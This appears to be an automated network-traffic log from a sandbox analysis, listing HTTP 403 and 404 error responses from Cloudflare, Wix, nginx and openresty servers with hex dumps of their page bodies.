cloudflareCF-RAY: 7aae7efae9825c85-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 4d 6b dc 30 10 86 ef fd 15 73 cb 65 d7 8e db a6 14 c7 5d 28 85 92 42 29 a5 b4 b9 8f ad b1 35 ec 58 32 d2 6c bc 6e e9 7f 2f f2 36 c4 c6 e4 10 9d 34 1f 3c f3 6a 5e 54 59 ed e5 f0 0a 00 a0 b2 84 e6 72 9d 43 65 15 3a 7c c7 8e e0 9b 57 f8 ec 4f ce 54 f9 25 fb d4 15 75 5a c6 e9 d4 de 4c 7f 56 99 74 7a 0c 1d bb f2 fa 76 53 19 d0 18 76 5d f9 e6 7a 38 6f ab ad 77 5a 16 af 87 73 5e 64 37 70 47 f2 40 ca 0d ee 3e 06 46 d9 dd 53 30 e8 70 17 d1 c5 7d a4 c0 ed 9a f0 77 15 d9 e2 25 ba d2 e4 7d e4 df 54 be 7d ff 9c b2 fd 48 dc 59 2d 9d 0f 3d ca b6 47 d8 d1 de 5e 7a b6 94 b5 ba a8 c1 bb 6e ab d0 70 1c 04 a7 92 dd 4c ab c5 37 c7 ed a4 91 8d da f2 dd cd f3 33 aa 7c 61 56 95 3f d9 5d 25 c7 16 9e da 62 63 bb 2d 16 f5 61 ed f7 4f 4b 30 a4 fe c9 9f 00 03 81 78 7f 64 d7 41 eb 03 34 fe 24 06 9c 57 a8 09 da 04 cb e0 93 a5 e6 08 6a 09 d0 98 40 31 42 8d 61 85 54 0f e4 e2 29 cc cc 00 bf 7e 7c 05 8e 10 07 12 21 03 8d 0f 81 1a 95 29 83 2f 2d a0 08 90 44 82 16 59 e2 6e 56 d1 a0 5b f1 1e 38 b2 42 42 59 df ff 57 8b 3a 4b 10 76 47 a8 49 fc 98 2d 36 b5 78 62 85 60 03 b5 1f ae ac ea 50 e6 f9 38 8e 59 8f 67 8b 6c 34 6b 7c 9f 5f 1d ee 67 7c a2 dd 25 7c 5a 5e 95 e3 e3 a2 2f db ad f2 f9 ab fd 03 00 00 ff ff 0d 0a Data Ascii: 197Mk0se](B)5X2ln/64<j^TYrCe:|WOT%uZLVtzvSv]z8owZs^d7pG@>FS0p}w%}T}HY-=G^znpL73|aV?]%bc-aOK0xdA4$Wj@1BaT)~|!)/-DYnV[8BBYW:KvGI-6xb`P8Ygl4k|_g|%|Z^/
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:03:02 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=js60vnilvkv6ejsvd5h3pi29in; expires=Mon, 20-Mar-2023 15:03:02 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uo0%2F7jSOBMWcKh2B%2FAPV3T3qmnn0aqPhl79yvZs%2Fyqb1XfmkPXkW0vOMMDAeQD61Oc9bty9koOSbpgWY6%2B%2B4aPsY1%2BAgaXHJdkChd%2BBhgJrdUNxiKaWMy12BUz60VMwzuv%2Bi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aae7f0abe209225-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 4d 6b dc 30 10 86 ef fd 15 73 cb 65 d7 8e db a6 14 c7 5d 28 85 92 42 29 a5 b4 b9 8f ad b1 35 ec 58 32 d2 6c bc 6e e9 7f 2f f2 36 c4 c6 e4 10 9d 34 1f 3c f3 6a 5e 54 59 ed e5 f0 0a 00 a0 b2 84 e6 72 9d 43 65 15 3a 7c c7 8e e0 9b 57 f8 ec 4f ce 54 f9 25 fb d4 15 75 5a c6 e9 d4 de 4c 7f 56 99 74 7a 0c 1d bb f2 fa 76 53 19 d0 18 76 5d f9 e6 7a 38 6f ab ad 77 5a 16 af 87 73 5e 64 37 70 47 f2 40 ca 0d ee 3e 06 46 d9 dd 53 30 e8 70 17 d1 c5 7d a4 c0 ed 9a f0 77 15 d9 e2 25 ba d2 e4 7d e4 df 54 be 7d ff 9c b2 fd 48 dc 59 2d 9d 0f 3d ca b6 47 d8 d1 de 5e 7a b6 94 b5 ba a8 c1 bb 6e ab d0 70 1c 04 a7 92 dd 4c ab c5 37 c7 ed a4 91 8d da f2 dd cd f3 33 aa 7c 61 56 95 3f d9 5d 25 c7 16 9e da 62 63 bb 2d 16 f5 61 ed f7 4f 4b 30 a4 fe c9 9f 00 03 81 78 7f 64 d7 41 eb 03 34 fe 24 06 9c 57 a8 09 da 04 cb e0 93 a5 e6 08 6a 09 d0 98 40 31 42 8d 61 85 54 0f e4 e2 29 cc cc 00 bf 7e 7c 05 8e 10 07 12 21 03 8d 0f 81 1a 95 29 83 2f 2d a0 08 90 44 82 16 59 e2 6e 56 d1 a0 5b f1 1e 38 b2 42 42 59 df ff 57 8b 3a 4b 10 76 47 a8 49 fc 98 2d 36 b5 78 62 85 60 03 b5 1f ae ac ea 50 e6 f9 38 8e 59 8f 67 8b 6c 34 6b 7c 9f 5f 1d ee 67 7c a2 dd 25 7c 5a 5e 95 e3 e3 a2 2f db ad f2 f9 ab fd 03 00 00 ff ff 03 00 60 33 21 c9 71 03 00 00 0d 0a Data Ascii: 1a1Mk0se](B)5X2ln/64<j^TYrCe:|WOT%uZLVtzvSv]z8owZs^d7pG@>FS0p}w%}T}HY-=G^znpL73|aV?]%bc-aOK0xdA4$Wj@1BaT)~|!)/-DYnV[8BBYW:KvGI-6xb`P8Ygl4k|_g|%|Z^/`3!q
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:03:04 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=h1a0rvrd3ad2v2fkjh2i9747jt; expires=Mon, 20-Mar-2023 15:03:04 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HSA%2FlSJc7%2FVd9jJLosbmcJq85vgCh2VmyFUQxfDe0To5uzI%2B3WYOmoxJGcQvP9OBlHlY93pAU99anYxqdql2bR2xPfaSbfKWD0kULWUewj0cuVouCqV2q05EdTU2WULMRoFX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aae7f1a881b35f9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 31 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 31 32 70 78 2f 31 2e 35 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6e 67 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 36 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 Data Ascii: 371<html> <head> <title>Page Not Found</title> <style> body{ margin:0; padding:30px; font:12px/1.5 Helvetica,Arial,Verdana,sans-serif; } h1{ margin:0; font-size:48px; font-weight:normal; line-height:48px; } strong{ display:inline-block; width:65px; } </style> </head> <body>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 20 Mar 2023 14:03:09 GMTContent-Type: text/htmlContent-Length: 146X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfsmx/BVT7iQPnHzz24cypK,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1679320989.9124863553616242X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 20 Mar 2023 14:03:13 GMTContent-Type: text/htmlContent-Length: 146X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMc64WE2N2IwUTo5CycBLugP,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1679320993.082625068665016359X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 20 Mar 2023 14:03:15 GMTContent-Type: text/htmlContent-Length: 146X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdYQrHtU+9G4PHzBHMB5kZ7,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1679320995.6336767487916045X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:03:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 2963x-wix-request-id: 1679320998.14516330743316732Age: 0X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcMnWGpNP0rsGN0u3APhu6Y,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=,2d58ifebGbosy5xc+FRalmN1/3SRG5yXcm9oEDWWfcKT3Hk+VaQk6aeaHI10uKmBjoe2GMQJ/MdiMK4Y/vI70zoD/J5EGh6Blxaj+C27iYE=,2UNV7KOq4oGjA5+PKsX47PpAuGwGFDWggbLa+hP4SSpWd3xniMsr1HjrszKGvMzr,7npGRUZHWOtWoP0Si3wDp7WuSH68sZSiNuj4ZnGbshE=,xTu8fpDe3EKPsMR1jrheEOmA27ebscGHyebDaDPCk6Y=,9y9YchCOVZDNGbMpBN9Negp96aY2N8IibZ9K5eXGb33TMHBfks53g3Rgx32HwzPsWIHlCalF7YnfvOr2cMPpyw==Vary: Accept-Encodingserver-timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3_gX-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleConnection: closeData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e Data Ascii: <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="n
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:06:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:06:03 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:06:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:06:08 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 20 Mar 2023 14:06:30 GMTContent-Type: text/htmlContent-Length: 62299Connection: closeETag: "627b7393-f35b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 2f 69 6d 67 2f 6f 67 5f 69 6d 61 67 65 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 30 20 63 6f 6c 2d 6c 67 2d 70 75 73 68 2d 31 22 3e 0a 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 14:06:43 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:06:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:06:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
